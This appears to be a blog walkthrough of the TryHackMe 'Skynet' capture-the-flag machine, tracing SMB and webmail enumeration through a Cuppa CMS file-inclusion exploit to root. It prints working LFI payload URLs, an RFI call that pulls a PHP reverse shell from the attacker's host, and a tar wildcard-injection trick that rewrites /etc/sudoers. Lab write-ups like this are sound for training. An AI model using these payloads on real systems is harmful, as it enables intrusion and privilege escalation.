Today it is time to solve another challenge called “Skynet”. It is available at TryHackMe for penetration testing practice. The challenge is of medium difficulty if you have the right basic knowledge and are attentive to little details that are required in the enumeration process. The breakdown of the Machine with the redacted flags is as follow:
Level: Easy
Penetration Testing Methodology
·
Network Scanning
o
Nmap Scan
·
Enumeration
o
Enumerating HTTP service
o
Enumerating SMB service
o
Getting files from Anonymous
Login
o
Directory Bruteforce using dirb
o
Enumerating the Squirrel Mail
instance
o
Getting the SMB share password
o
Enumerating SMB service
o
Getting web directory
o
Directory Bruteforce using dirb
o
Enumerating Cuppa CMS
·
Exploitation
o
Getting exploit from
Searchsploit
o
Reading the LFI/RFI Exploit
o
Reading /etc/passwd file using
LFI
o
Exploiting RFI to get a shell
as www-data
o
Reading User Flag
·
Privilege Escalation
o
Enumerating Backup Files
o
Exploiting Linux Wildcard
o
Getting Root Shell
o
Reading Root Flag
Walkthrough
There are 2 flags in this machine to
discover. After Booting up the target machine from the TryHackMe: Skynet
CTF Page, an IP will be assigned to the machine and will be visible
on that page as well.
IP Address: 10.10.61.86
Network Scanning
We will start a nmap scan with the -sC for
Default Scripts and -sV for Scanning Versions.
nmap -sC -sV 10.10.61.86
We have a bunch of services running on the
target machine. We have the 22 (SSH), 80 (HTTP), 110 (POP3), 139/445 (SMB), 143
(IMAP).
Enumeration
We cannot enumerate SSH since we lack the
credentials. Similarly, there seems to be a Mail Server setup that cannot be accessed
from here. That leaves us with SMB and HTTP. We will begin our enumeration with
HTTP. We see that there is a website
loaded that looks like a search engine. We tried to tinker around with it but
there wasn’t much to go on.
http://10.10.61.86
This meant we need to focus on SMB service
for any further enumeration. We connected to the SMB service using the
smbclient. We found two shares on the machine. Anonymous and Miles Dyson.
smbclient -L 10.10.61.86
Since Miles Dyson requires credentials, we
tried to connect to the Anonymous share. After connecting to the share, we see
that there is a text file by the name of attention.txt and a directory by the
name of logs. In the logs directory, there were three text files containing 3
log files. We downloaded all the text files back to our local machine to
observe them.
smbclient //10.10.61.86/anonymous
ls
get attention.txt
cd logs
ls
get log1.txt
get log2.txt
get log3.txt
The attention.txt file reads that there has
been a recent system malfunction that caused various passwords to be changed.
It requests all the employees to change their passwords. The log files log2 and
log3 were empty and log1 contains a list of possible passwords related to the
Terminator Movie Franchise.
cat attention.txt
cat log1.txt
cat log2.txt
cat log3.txt
Another step for enumeration is to perform
a Directory Bruteforce. We used the dirb tool for performing the directory
Bruteforce. We found a SquirrelMail directory. There is a possibility that the
Mail service that we detected at the beginning from nmap might be a SquirrelMail
instance.
dirb http://10.10.61.86
Opening the directory on the web browser we
see that it was redirected to the Login page. Before trying a bunch of other
options that can be used to Bruteforce the login, we tried to enter a bunch of
default credentials and then eventually the username milesdyson and the
password cyborg007haloterminator. This was the first password inside the
log1.txt file that we acquired earlier.
http://10.10.61.86/squirrelmail/
Username: milesdyson
Password: cyborg007haloterminator
After looking for mails inside the Inbox and Sent Box, we were able to procure the following mail. It says that the password for the milesdyson user has been changed after the malfunction. It gives us the updated password.
Password: )s{A&2Z=F^n_E.B`
Since we have the password for the private
share of the milesdyson, we can use it to enumerate his files shared over SMB.
We again use the smbclient to access milesdyson share. Among some pdfs about
neural networks and AI, we found a directory by the name of notes. Inside the
notes directory, we found some markdown files. Among them was a text file by
the name of improtatnt.txt.
smbclient //10.10.61.86/milesdyson -U
milesdyson
)s{A&2Z=F^n_E.B`
ls
cd notes
ls
The markdown files seemed to be the basic
notes but the important file seemed to the text file. We transferred the file
to our local machine. Upon reading we see that a directory is mentioned among
other things in the to-do list.
get important.txt
cat important.txt
We open the directory mentioned in the
important.txt on our web browser and we found ourselves Miles Dyson Character’s
picture and a brief introduction. He is the inventor/creator of Skynet. The AI
that takes over mankind in Terminator Movie Franchise.
http://10.10.61.86/45kra24zxs28v3yd/
Since we couldn’t find any more clues or
files in the directory by ourselves, we decided to perform a directory
Bruteforce inside this newly founded directory. We found an administrator
directory.
dirb
http://10.10.61.86/45kra24zxs28v3yd/
Upon opening the administrator directory in
the web browser, we see that it is an instance of Cuppa CMS. We are greeted
with a login panel.
http://10.10.61.86/45kra24zxs28v3yd/administrator/
Exploitation
From our previous encounter with the Cuppa
CMS in the Digital
World Local Bravery Vulnhub Walkthrough, we know that it is
vulnerable to a Local File Inclusion Attack. We open searchsploit and search
for the exploit in CMS. After locating the exploit, we download the exploit
text file to our local machine to take a closer look.
searchsploit cuppa
searchsploit -m 25971.txt
Reading the text file for the exploit, we
see that it is possible to read the Local files on the target machine by
targeting the urlConfig parameter in the alertConfigField.php. The best part is
that it doesn’t even warrant a login into the CMS.
cat 25971.txt
http://target/cuppa/alerts/alertConfigField.php?urlConfig=http://www.shell.com/shell.txt?
http://target/cuppa/alerts/alertConfigField.php?urlConfig=../../../../../../../../../etc/passwd
We craft the URL to suit the IP Address of
our target machine and see that we can read the /etc/passwd file on the target
machine.
http://10.10.61.86/45kra24zxs28v3yd/administrator/alerts/alertConfigField.php?urlConfig=../../../../../../../../../etc/passwd
From the text file of the exploit and the
result of searchsploit, we know that it is possible to include a remote file similarly.
This means that the CMS is vulnerable to the Remote File Inclusion attack as
well. This will help as we will use the php reverse shell file that is found in
Kali Linux and point at it through the target machine to exploit the RFI to get
a shell on the target machine. We edited the php reverse shell file to include
our local (VPN) IP Address and then used the python HTTP server one-liner to
host the file.
nano php-reverse-shell.php
python -m SimpleHTTPServer
We changed the IP address in the URL to
accommodate the address of the now hosted php reverse shell. Before executing the exploit, we first need to
create a Netcat listener on the port mentioned in the php reverse shell file.
By default, it is 1234. Then execute the payload through the web browser as
depicted below.
http://10.10.61.86/45kra24zxs28v3yd/administrator/alerts/alertConfigField.php?urlConfig=http://10.10.110.53:8000/php-reverse-shell.php
As soon as the exploit is executed, we get
a shell on our Netcat listener. We use the id command to check the user and
group details and found that the shell that we have procured is for the user
www-data.
nc -lvp 1234
id
We move to the home directory to see what
are various users created on the target machine. We see that there is a single
user by the name of milesdyson. We found the user flag inside its home
directory.
cd /home
ls
cd milesdyson
cat user.txt
Privilege Escalation
While looking for the user flag, we see
that there is a backups directory inside the milesdyson home directory.
Traversing inside, we see that it has a shell script by the name of the backup.sh.
Reading the shell file, we see that it contains a * wildcard. As covered by our
Exploiting
Wildcard for Privilege Escalation Article, we need to check the
/etc/crontab file. We see that the backup shell script is scheduled to execute
at intervals of 1 minute.
cd backups
ls -la
cat backup.sh
cat /etc/crontab
There were multiple methods to get root
from this vulnerability, we decided to use it to grant the sudoers permission
instead of getting another shell. So, we moved to the directory that is being
backed up and then created another shell script by the name of pavan.sh and
entered the command inside it using echo. Then we proceeded to enter the
checkpoint that will run the shell command when the tar will be backing up the
directory. Using the sudo -l command we saw that the sudoers entry has been
made. We just use the sudo bash command to get the root shell. We read the root
flag to conclude the machine.
cd /var/www/html
echo 'echo "www-data ALL=(root)
NOPASSWD: ALL" > /etc/sudoers' > pavan.sh
echo "/var/www/html" > "--checkpoint-action=exec=sh
pavan.sh"
echo "/var/www/html" > --checkpoint=1
sudo -l
sudo bash
cat /root/root.txt
0 comments:
Post a Comment